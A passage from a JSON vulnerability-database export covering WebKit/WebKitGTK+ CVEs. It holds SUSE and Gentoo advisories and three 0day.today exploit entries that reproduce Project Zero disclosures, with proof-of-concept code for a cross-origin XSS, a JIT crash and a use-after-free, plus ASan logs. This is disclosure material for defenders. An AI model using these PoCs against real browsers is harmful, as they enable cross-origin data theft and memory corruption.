CVE-2017-7094, CVE-2017-7095, CVE-2017-7096, CVE-2017-7098,\n CVE-2017-7099, CVE-2017-7100, CVE-2017-7102, CVE-2017-7104,\n CVE-2017-7107, CVE-2017-7109, CVE-2017-7111, CVE-2017-7117,\n CVE-2017-7120, CVE-2017-7142.\n\n - Enable gold linker on s390/s390x on SLE15/Tumbleweed.\n\n", "edition": 1, "modified": 
"2018-01-25T21:10:00", "published": "2018-01-25T21:10:00", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-01/msg00056.html", "id": "SUSE-SU-2018:0219-1", "type": "suse", "title": "Security update for webkit2gtk3 (important)", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2017-10-15T08:23:04", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7034", "CVE-2017-7043", "CVE-2017-7020", "CVE-2017-7038", "CVE-2017-7042", "CVE-2017-7037", "CVE-2017-7018", "CVE-2017-7039", "CVE-2017-7012", "CVE-2017-7019", "CVE-2017-7040", "CVE-2017-7011", "CVE-2017-7006", "CVE-2017-7030", "CVE-2017-7041"], "description": "### Background\n\nWebKitGTK+ is a full-featured port of the WebKit rendering engine, suitable for projects requiring any kind of web integration, offers Webkit\u2019s full functionality and is used on a wide range of systems. \n\n### Description\n\nMultiple vulnerabilities have been discovered in WebkitGTK+. Please review the references below for details. \n\n### Impact\n\nA remote attacker could execute arbitrary code, cause a Denial of Service condition, bypass intended memory-read restrictions, conduct a timing side-channel attack to bypass the Same Origin Policy, obtain sensitive information, or spoof the address bar. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll WebKitGTK+ users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-libs/webkit-gtk-2.16.6\"\n \n\nPackages which depend on this library may need to be recompiled. 
Tools such as revdep-rebuild may assist in identifying some of these packages.", "edition": 1, "modified": "2017-10-13T00:00:00", "published": "2017-10-13T00:00:00", "href": "https://security.gentoo.org/glsa/201710-14", "id": "GLSA-201710-14", "title": "WebKitGTK+: Multiple Vulnerabilities", "type": "gentoo", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-17T20:44:52", "bulletinFamily": "unix", "cvelist": ["CVE-2017-2538", "CVE-2017-2424"], "description": "### Background\n\nWebKitGTK+ is a full-featured port of the WebKit rendering engine, suitable for projects requiring any kind of web integration, offers Webkit\u2019s full functionality and is used on a wide range of systems. \n\n### Description\n\nMultiple vulnerabilities have been discovered in WebkitGTK+. Please review the references below for details. \n\n### Impact\n\nA remote attacker could execute arbitrary code via crafted web content.\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll WebkitGTK+ users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-libs/webkit-gtk-2.16.5\"\n \n\nPackages which depend on this library may need to be recompiled. 
Tools such as revdep-rebuild may assist in identifying some of these packages.", "edition": 1, "modified": "2017-09-17T00:00:00", "published": "2017-09-17T00:00:00", "href": "https://security.gentoo.org/glsa/201709-03", "id": "GLSA-201709-03", "title": "WebKitGTK+: Multiple vulnerabilities", "type": "gentoo", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "zdt": [{"lastseen": "2018-03-19T05:16:24", "description": "WebKit JSC JSObject::putInlineSlow and JSValue::putToPrimitive suffer from a universal cross site scripting vulnerability.", "edition": 1, "published": "2017-07-25T00:00:00", "type": "zdt", "title": "WebKit JSC JSObject::putInlineSlow / JSValue::putToPrimitive XSS Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7037"], "modified": "2017-07-25T00:00:00", "href": "https://0day.today/exploit/description/28186", "id": "1337DAY-ID-28186", "sourceData": "WebKit: JSC: UXSS via JSObject::putInlineSlow and JSValue::putToPrimitive \r\n\r\nCVE-2017-7037\r\n\r\n\r\nJSObject::putInlineSlow and JSValue::putToPrimitive use getPrototypeDirect instead of getPrototype to get an object's prototype. 
So JSDOMWindow::getPrototype which checks the Same Origin Policy is not called.\r\n\r\nThe PoC shows to call a setter of another origin's object.\r\n\r\nPoC 1 - JSValue::putToPrimitive:\r\n<body>\r\n<script>\r\n\r\nlet f = document.body.appendChild(document.createElement('iframe'));\r\nlet loc = f.contentWindow.location;\r\nf.onload = () => {\r\n let a = 1.2;\r\n a.__proto__.__proto__ = f.contentWindow;\r\n\r\n a['test'] = {toString: function () {\r\n arguments.callee.caller.constructor('alert(location)')();\r\n }};\r\n};\r\nf.src = 'data:text/html,' + `<iframe></iframe><script>\r\nObject.prototype.__defineSetter__('test', v => {\r\n 'a' + v;\r\n});\r\n\r\n</scrip` + `t>`;\r\n\r\n</script>\r\n</body>\r\n\r\n\r\nPoC 2 - JSObject::putInlineSlow:\r\n<body>\r\n<script>\r\n\r\nlet f = document.body.appendChild(document.createElement('iframe'));\r\nlet loc = f.contentWindow.location;\r\nf.onload = () => {\r\n let a = {\r\n __proto__: f.contentWindow\r\n };\r\n\r\n a['test'] = {toString: function () {\r\n arguments.callee.caller.constructor('alert(location)')();\r\n }};\r\n};\r\nf.src = 'data:text/html,' + `<iframe></iframe><script>\r\nObject.prototype.__defineSetter__('test', v => {\r\n 'a' + v;\r\n});\r\n\r\n</scrip` + `t>`;\r\n</script>\r\n</body>\r\n\r\nThis bug is subject to a 90 day disclosure deadline. 
After 90 days elapse\r\nor a patch has been made broadly available, the bug report will become\r\nvisible to the public.\n\n# 0day.today [2018-03-19] #", "sourceHref": "https://0day.today/exploit/28186", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-02-20T01:22:52", "description": "WebKit suffers from a JSC incorrect scope register handling in DFG::ByteCodeParser::flush(InlineStackEntry* inlineStackEntry).", "edition": 1, "published": "2017-07-25T00:00:00", "type": "zdt", "title": "WebKit JSC Incorrect Scope Register Handling Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7018"], "modified": "2017-07-25T00:00:00", "href": "https://0day.today/exploit/description/28184", "id": "1337DAY-ID-28184", "sourceData": "WebKit: JSC: Incorrect scope register handling in DFG::ByteCodeParser::flush(InlineStackEntry* inlineStackEntry) \r\n\r\nCVE-2017-7018\r\n\r\n\r\nHere's a snippet of DFG::ByteCodeParser::flush(InlineStackEntry* inlineStackEntry).\r\n\r\nvoid flush(InlineStackEntry* inlineStackEntry)\r\n{\r\n ...\r\n if (m_graph.needsScopeRegister())\r\n flush(m_codeBlock->scopeRegister()); <<--- (a)\r\n}\r\n\r\nAt (a), it should flush the scope register of |inlineStackEntry->m_codeBlock| instead of |m_codeBlock|. But it doesn't. As a result, the scope register of |inlineStackEntry->m_codeBlock| may have an incorrect offset in the stack layout phase.\r\n\r\nPoC:\r\nfunction f() {\r\n (function () {\r\n eval('1');\r\n f();\r\n }());\r\n\r\n throw 1;\r\n}\r\n\r\nf();\r\n\r\n\r\n\r\nThis bug is subject to a 90 day disclosure deadline. 
After 90 days elapse\r\nor a patch has been made broadly available, the bug report will become\r\nvisible to the public.\n\n# 0day.today [2018-02-19] #", "sourceHref": "https://0day.today/exploit/28184", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-03-14T14:36:37", "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "published": "2017-07-24T00:00:00", "title": "WebKit - WebCore::RenderObject with Accessibility Enabled Use-After-Free Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7046"], "modified": "2017-07-24T00:00:00", "href": "https://0day.today/exploit/description/28176", "id": "1337DAY-ID-28176", "sourceData": "<!--\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1246\r\n \r\nThere is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly.\r\n \r\nNote that accessibility features need to be enabled in order to trigger this bug. On Safari on Mac this can be accomplished by opening the inspector (simply opening the inspector enables accessibility features). 
On WebKitGTK+ (and possibly other WebKit releases) accessibility features are enabled by default.\r\n \r\nPoC:\r\n \r\n=================================================================\r\n-->\r\n \r\n<style>\r\n#link { text-transform: lowercase; }\r\nlink::first-letter { border-spacing: 1em; }\r\n</style>\r\n<script>\r\nfunction go() {\r\n dt.appendChild(link);\r\n var s = link.style;\r\n s.setProperty(\"display\", \"table-column-group\");\r\n s.setProperty(\"-webkit-appearance\", \"menulist-button\");\r\n}\r\nfunction eventhandler() {\r\n dir.setAttribute(\"aria-labeledby\", \"meta\");\r\n link.appendChild(table.rows[0]);\r\n}\r\n</script>\r\n<body onload=go()>\r\n<link id=\"link\">\r\n<meta id=\"meta\">\r\n<dir id=\"dir\">\r\n<table id=\"table\">\r\n<th>1</th>\r\n<dt id=\"dt\">\r\n<iframe onload=\"eventhandler()\"></iframe>\r\n \r\n<!--\r\n=================================================================\r\n \r\nASan log:\r\n \r\n=================================================================\r\n==30692==ERROR: AddressSanitizer: heap-use-after-free on address 0x608000090ac8 at pc 0x00010841ba26 bp 0x7fff5ca8ea60 sp 0x7fff5ca8ea58\r\nREAD of size 4 at 0x608000090ac8 thread T0\r\n==30692==WARNING: invalid path to external symbolizer!\r\n==30692==WARNING: Failed to use and restart external symbolizer!\r\n #0 0x10841ba25 in WebCore::RenderObject::RenderObjectBitfields::hasLayer() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x6aa25)\r\n #1 0x10a8983fe in WebCore::RenderElement::addChild(WebCore::RenderObject*, WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x24e73fe)\r\n #2 0x10ab7d6ec in WebCore::createTextRenderer(WebCore::Text&, WebCore::RenderTreePosition&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27cc6ec)\r\n #3 0x10ab7b057 in 
WebCore::RenderTreeUpdater::updateTextRenderer(WebCore::Text&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27ca057)\r\n #4 0x10ab7abfa in WebCore::RenderTreeUpdater::updateRenderTree(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c9bfa)\r\n #5 0x10ab7a47b in WebCore::RenderTreeUpdater::commit(std::__1::unique_ptr<WebCore::Style::Update const, std::__1::default_delete<WebCore::Style::Update const> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c947b)\r\n #6 0x108b1f7e9 in WebCore::Document::resolveStyle(WebCore::Document::ResolveStyleType) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76e7e9)\r\n #7 0x108b20287 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f287)\r\n #8 0x108ec59ce in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb149ce)\r\n #9 0x108ec2d0c in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb11d0c)\r\n #10 0x108b3e493 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x78d493)\r\n #11 0x1090b25c0 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd015c0)\r\n #12 0x108bdd093 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c093)\r\n #13 0x108b9c386 in WebCore::DocumentLoader::finishedLoading() 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386)\r\n #14 0x10862b997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997)\r\n #15 0x1086252aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa)\r\n #16 0x10afacc41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41)\r\n #17 0x105ec22eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb)\r\n #18 0x105ec5689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689)\r\n #19 0x105ec4ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9)\r\n #20 0x105765683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683)\r\n #21 0x10550f3b5 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5)\r\n #22 0x105518888 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888)\r\n #23 0x1162c0312 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03312)\r\n #24 0x1162c0d41 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03d41)\r\n #25 0x7fffd2f753c0 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa73c0)\r\n #26 0x7fffd2f562cc in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x882cc)\r\n #27 0x7fffd2f557c5 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x877c5)\r\n #28 0x7fffd2f551c3 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x871c3)\r\n #29 0x7fffd24b6ebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb)\r\n #30 0x7fffd24b6cf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0)\r\n #31 0x7fffd24b6b25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25)\r\n #32 0x7fffd0a51e23 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46e23)\r\n #33 0x7fffd11cd85d in -[NSApplication(NSEvent) 
_nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c285d)\r\n #34 0x7fffd0a467aa in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b7aa)\r\n #35 0x7fffd0a111dd in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x61dd)\r\n #36 0x7fffe89118c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6)\r\n #37 0x7fffe89102e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3)\r\n #38 0x10316c56c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c)\r\n #39 0x7fffe86b8234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234)\r\n \r\n0x608000090ac8 is located 40 bytes inside of 96-byte region [0x608000090aa0,0x608000090b00)\r\nfreed by thread T0 here:\r\n #0 0x1031d4294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294)\r\n #1 0x116307f30 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c4af30)\r\n #2 0x10a79d874 in WebCore::RenderBlock::createFirstLetterRenderer(WebCore::RenderElement*, WebCore::RenderText*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23ec874)\r\n #3 0x10a79e15a in WebCore::RenderBlock::updateFirstLetter(WebCore::RenderBlock::RenderTreeMutationIsAllowed) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23ed15a)\r\n #4 0x10a783761 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d2761)\r\n #5 
0x10a80333f in WebCore::RenderBlockFlow::layoutLineBoxes(bool, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x245233f)\r\n #6 0x10a7ca957 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419957)\r\n #7 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7)\r\n #8 0x10a7cfd9c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241ed9c)\r\n #9 0x10a7cc522 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241b522)\r\n #10 0x10a7ca962 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419962)\r\n #11 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7)\r\n #12 0x10a7cfd9c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241ed9c)\r\n #13 0x10a7cc522 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241b522)\r\n #14 0x10a7ca962 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419962)\r\n #15 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7)\r\n #16 0x10a7cfd9c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241ed9c)\r\n #17 0x10a7cc522 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241b522)\r\n #18 0x10a7ca962 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419962)\r\n #19 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7)\r\n #20 0x10a7cfd9c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241ed9c)\r\n #21 0x10a7cc522 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241b522)\r\n #22 0x10a7ca962 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419962)\r\n #23 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7)\r\n #24 0x10ab8536d in 
WebCore::RenderView::layoutContent(WebCore::LayoutState const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27d436d)\r\n #25 0x10ab85b74 in WebCore::RenderView::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27d4b74)\r\n #26 0x108f00943 in WebCore::FrameView::layout(bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb4f943)\r\n #27 0x108b1a1d0 in WebCore::Document::updateLayout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7691d0)\r\n #28 0x108b207b2 in WebCore::Document::updateLayoutIgnorePendingStylesheets(WebCore::Document::RunPostLayoutTasks) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f7b2)\r\n #29 0x108cd3b21 in WebCore::Element::innerText() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x922b21)\r\n \r\npreviously allocated by thread T0 here:\r\n #0 0x1031d3d2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c)\r\n #1 0x7fffe883a281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281)\r\n #2 0x116311ae4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c54ae4)\r\n #3 0x116306c4d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c49c4d)\r\n #4 0x11629c437 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bdf437)\r\n #5 0x11629b768 in 
WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bde768)\r\n #6 0x1085bb548 in WebCore::RenderObject::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x20a548)\r\n #7 0x10b157c4d in WebCore::RenderPtr<WebCore::RenderText> WebCore::createRenderer<WebCore::RenderText, WebCore::Text&, WTF::String const&>(WebCore::Text&&&, WTF::String const&&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2da6c4d)\r\n #8 0x10b157aae in WebCore::Text::createTextRenderer(WebCore::RenderStyle const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2da6aae)\r\n #9 0x10ab7d6a4 in WebCore::createTextRenderer(WebCore::Text&, WebCore::RenderTreePosition&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27cc6a4)\r\n #10 0x10ab7b057 in WebCore::RenderTreeUpdater::updateTextRenderer(WebCore::Text&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27ca057)\r\n #11 0x10ab7abfa in WebCore::RenderTreeUpdater::updateRenderTree(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c9bfa)\r\n #12 0x10ab7a47b in WebCore::RenderTreeUpdater::commit(std::__1::unique_ptr<WebCore::Style::Update const, std::__1::default_delete<WebCore::Style::Update const> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c947b)\r\n #13 0x108b1f7e9 in WebCore::Document::resolveStyle(WebCore::Document::ResolveStyleType) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76e7e9)\r\n #14 0x108b20287 in WebCore::Document::implicitClose() 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f287)\r\n #15 0x108ec59ce in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb149ce)\r\n #16 0x108ec2d0c in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb11d0c)\r\n #17 0x108b3e493 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x78d493)\r\n #18 0x1090b25c0 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd015c0)\r\n #19 0x108bdd093 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c093)\r\n #20 0x108b9c386 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386)\r\n #21 0x10862b997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997)\r\n #22 0x1086252aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa)\r\n #23 0x10afacc41 in 